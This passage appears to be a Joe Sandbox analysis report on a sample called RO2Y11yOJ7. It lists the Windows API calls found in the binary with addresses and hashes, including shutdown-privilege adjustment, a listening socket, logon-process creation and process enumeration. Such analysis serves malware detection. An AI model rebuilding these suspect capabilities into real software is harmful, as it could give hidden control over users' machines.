                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: ac37dc41c2cc613f811d98e95597a012a8acdb1870ec0b1d7ab9520f08b1b83f
                                                          • Instruction ID: 2facf064d776718d46a70c97ab69c84455a530f92d8c528a35fdf70df104a209
                                                          • Opcode Fuzzy Hash: ac37dc41c2cc613f811d98e95597a012a8acdb1870ec0b1d7ab9520f08b1b83f
                                                          • Instruction Fuzzy Hash: 11317E31009385AFC307EB64CC959AFB7ECAE96314F444E2DF4D19A191DB21EA09C762
                                                          APIs
                                                            • Part of subcall function 00398AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00398AED
                                                            • Part of subcall function 00398AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398B1A
                                                            • Part of subcall function 00398AA3: GetLastError.KERNEL32 ref: 00398B27
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003A52A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: ef01738dbfb2f803222cd6fe20e821fc295d62b4b2eb106e808a4e406a057834
                                                          • Instruction ID: 97ce9c1e11d91cb1010c4121a0e1e33ef1f6e8ba4589c98a373e9007002f9c7c
                                                          • Opcode Fuzzy Hash: ef01738dbfb2f803222cd6fe20e821fc295d62b4b2eb106e808a4e406a057834
                                                          • Instruction Fuzzy Hash: 9801F272A906166EFB2B26689C4BFBA725CEB07741F250A25F907D24D2E9616C008690
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID: Oa5
                                                          • API String ID: 674341424-2933034282
                                                          • Opcode ID: 4cb02be848a69ccae08b944a1604024830a9cae7e4c6df6cc3657b7d7f93ca50
                                                          • Instruction ID: ed2c37e05bbc7765fa8d0d094a81d74a2a26158958fe07641beae6902bc1279d
                                                          • Opcode Fuzzy Hash: 4cb02be848a69ccae08b944a1604024830a9cae7e4c6df6cc3657b7d7f93ca50
                                                          • Instruction Fuzzy Hash: E6229D715083019FC726EF24C891F6FB7E5AF85344F11491DF8969B2A1EB71EA08CB92
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B63F2
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6401
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003B641D
                                                          • listen.WSOCK32(00000000,00000005), ref: 003B642C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6446
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 003B645A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: bb4c258aa91b65ba2820d3ba4adb8c98d0c0dc78b02e2649dee5339a99a69547
                                                          • Instruction ID: 5cf526dc3c01ad79b92a92a85864404b1a2f5c461eae888152a1e8aa2eb91763
                                                          • Opcode Fuzzy Hash: bb4c258aa91b65ba2820d3ba4adb8c98d0c0dc78b02e2649dee5339a99a69547
                                                          • Instruction Fuzzy Hash: 5221BB352006009FCB02AF64C886BAEB7E9EF44724F118169E966AB392CB30BC008B51
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0039890A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00398911
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00398920
                                                          • CloseHandle.KERNEL32(00000004), ref: 0039892B
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039895A
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 0039896E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                                          • Instruction ID: e769e2b4c25115a86cd4f39f9a65e5addce91c439f4b171dc7ce8198f84798f0
                                                          • Opcode Fuzzy Hash: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                                          • Instruction Fuzzy Hash: 5C114772500209AFDF029FA8DD49FEA7BADFF49748F054065FA05A2160C7729D60AB61
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 003419FA
                                                          • GetSysColor.USER32(0000000F), ref: 00341A4E
                                                          • SetBkColor.GDI32(?,00000000), ref: 00341A61
                                                            • Part of subcall function 00341290: DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 045ed1e9d275a7acc5f546e213d931f6f553353e8e9091bec5a1be684f8d649a
                                                          • Instruction ID: 394ecbd6e03766a04cf07619ff45a7a17cccd4d0b74434f400f9f6c359e20292
                                                          • Opcode Fuzzy Hash: 045ed1e9d275a7acc5f546e213d931f6f553353e8e9091bec5a1be684f8d649a
                                                          • Instruction Fuzzy Hash: E6A17971112D44BEE63BAE288C48F7F79EDDB41381F164119F406DE581CB28BC8197B5
                                                          APIs
                                                            • Part of subcall function 003B7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003B7ECB
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B68B4
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B68DD
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003B6916
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6923
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 003B6937
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: 2513adaf8e57e4b32099643feec105a882712cc83ac0be6d7cd3dba45a0211e0
                                                          • Instruction ID: fa56aed8ad8514fd45495dafa950c18b22817a91f1741e15a6d1cba28f754f38
                                                          • Opcode Fuzzy Hash: 2513adaf8e57e4b32099643feec105a882712cc83ac0be6d7cd3dba45a0211e0
                                                          • Instruction Fuzzy Hash: 5441A175A00210AFEB12AF649C87F6E77E9DF44714F048059FA1AAF3D2DA74AD008B91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 31dc0d56535b1ac90809ecb964ab390d30e93060070a12b6288ef50765b6d764
                                                          • Instruction ID: 3d7f2da0f90fbd55ec64d4b1055e0ddcd4301e08af93b6686a922411c485b9bc
                                                          • Opcode Fuzzy Hash: 31dc0d56535b1ac90809ecb964ab390d30e93060070a12b6288ef50765b6d764
                                                          • Instruction Fuzzy Hash: 4B118B327009106FE7276F279C44F2ABB9DFF84762B05402DE846DB251CB60BC8287A5
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003AC4BE
                                                          • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003AC4D6
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • CoUninitialize.OLE32 ref: 003AC743
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: 7303ab2058574ce18a034a52e5d2914ddf6ee7c7f9dc3be02cc69ce7cdad0793
                                                          • Instruction ID: 6e4ec0ea6e097b3941489e920cdb9b2c5d67d42db49d919f8c8e115a13a580a4
                                                          • Opcode Fuzzy Hash: 7303ab2058574ce18a034a52e5d2914ddf6ee7c7f9dc3be02cc69ce7cdad0793
                                                          • Instruction Fuzzy Hash: B4A12A71108205AFD701EF54C891EABB7ECEF95304F00495DF1969F2A2EB71EA49CB52
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00381CB7,?), ref: 003BC112
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003BC124
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: a5a7f3c72d2c429dbc0bbf35c1e2f95e0b399926d3054e98cdffb4d97dc41dad
                                                          • Instruction ID: 59d4de5b780320e41473be91d55840f91e99f2f4811951d09fdd8f39424316cc
                                                          • Opcode Fuzzy Hash: a5a7f3c72d2c429dbc0bbf35c1e2f95e0b399926d3054e98cdffb4d97dc41dad
                                                          • Instruction Fuzzy Hash: 6CE08C78610323CFC7325B29C818F82B6E8EF08348B45843AE98AE2650E778E840C710
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 003BEF51
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 003BEF5F
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 003BF01F
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003BF02E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 541ebceb0d6b7d714700026738d07591270e3c809c527bad3bfcd57439fe045a
                                                          • Instruction ID: b72b1eb29c52781d489c078ec5c48b30a6f49cc6e80d1969551aa6cfe1a15cfb
                                                          • Opcode Fuzzy Hash: 541ebceb0d6b7d714700026738d07591270e3c809c527bad3bfcd57439fe045a
                                                          • Instruction Fuzzy Hash: E7516E71508300AFD312EF24DC85EABB7E8FF94714F14482DF5959B262EB70A908CB92
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0039E93A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: c15c3961852419f52cd9d301758185f082c7772e390190e6c6aa33342e81dfb0
                                                          • Instruction ID: a637863e6b15d82de088c0e51d3088790934d96fceb2776953c0a276fc4251a9
                                                          • Opcode Fuzzy Hash: c15c3961852419f52cd9d301758185f082c7772e390190e6c6aa33342e81dfb0
                                                          • Instruction Fuzzy Hash: 9E322575A00605DFCB29DF29C48196AB7F1FF48320B16C56EE89ADB7A1E770E941CB40
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003B1920,00000000), ref: 003B24F7
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003B252E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 5c6f1cd9a33c89133ccfa932b87f8eb19bd27093ce9ddde370fd6945efaf5439
                                                          • Instruction ID: 3947eac54c4c394e367efe0eeebdbd6875890c1cc7a1e6edfddd7bb95ba0070c
                                                          • Opcode Fuzzy Hash: 5c6f1cd9a33c89133ccfa932b87f8eb19bd27093ce9ddde370fd6945efaf5439
                                                          • Instruction Fuzzy Hash: 1F41C771A04209BFEB22DE95DC85EFBB7BCEB41728F10816BF701A6D40DB719E419650
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AB3CF
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003AB429
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003AB476
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 5e85b1c8ea941d72e456b0da59e23881440a22394917d18be9797baee2860056
                                                          • Instruction ID: f6baab5b569195fdaf535963d873a355940a3e6be276146690d3fcacfcb59403
                                                          • Opcode Fuzzy Hash: 5e85b1c8ea941d72e456b0da59e23881440a22394917d18be9797baee2860056
                                                          • Instruction Fuzzy Hash: 09213135A10518DFCB01EFA5D885EAEBBF8FF49310F1480AAE905AF351DB31A915CB51
                                                          APIs
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00398AED
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398B1A
                                                          • GetLastError.KERNEL32 ref: 00398B27
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 997ee02db19caac62d053075d97c241ebb911daa5b962857a3bcf012600760cb
                                                          • Instruction ID: d68746f58e2897cf04650bdb9ef829a60a13dc7f94ceca85abae5a46ea4f2906
                                                          • Opcode Fuzzy Hash: 997ee02db19caac62d053075d97c241ebb911daa5b962857a3bcf012600760cb
                                                          • Instruction Fuzzy Hash: FC11BCB2514208AFD729AF64DC86D2BBBBDFB44710B20816EF4469B241EB30BC00CB60
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003A4A31
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003A4A48
                                                          • FreeSid.ADVAPI32(?), ref: 003A4A58
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                                          • Instruction ID: f2257be171490786fc302596b98ce4ec8b095ab4bc8a36eb851243248dc3b167
                                                          • Opcode Fuzzy Hash: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                                          • Instruction Fuzzy Hash: 3FF03775A51208BFDB00DFE09C89EBEBBBDEB08701F0044A9A901E2181E6746A048B54
                                                          APIs
                                                          • __time64.LIBCMT ref: 003A8944
                                                            • Part of subcall function 0036537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003A9017,00000000,?,?,?,?,003A91C8,00000000,?), ref: 00365383
                                                            • Part of subcall function 0036537A: __aulldiv.LIBCMT ref: 003653A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID: 0e@
                                                          • API String ID: 2893107130-3044860656
                                                          • Opcode ID: 81f4e7081525cd778f9870f8ac3b0606d3c7c24f3409ab18e04d9b79373adbbe
                                                          • Instruction ID: f43cd43937af9268202b622208c582af1880e2a21fbd54095504e86e0195018b
                                                          • Opcode Fuzzy Hash: 81f4e7081525cd778f9870f8ac3b0606d3c7c24f3409ab18e04d9b79373adbbe
                                                          • Instruction Fuzzy Hash: 3E21A232625610CBC72ACF29D841A52B3E1EBA5310B298E6CD1E6DF2D0CA74A905CB54
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03465d01526455443ed2c05660ea74499b8617b3e489c997a196dc7e39d22a88
                                                          • Instruction ID: 659856415f5e2f229aa13bc767b876f11dfaa48a0ff6e89e4128113070b93f3f
                                                          • Opcode Fuzzy Hash: 03465d01526455443ed2c05660ea74499b8617b3e489c997a196dc7e39d22a88
                                                          • Instruction Fuzzy Hash: CB229C74A00216CFDB26EF68C481AAEB7F4FF08310F158569E856AF351E374AD85CB91
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003AC787
                                                          • FindClose.KERNEL32(00000000), ref: 003AC7B7
                                                          Memory Dump Source
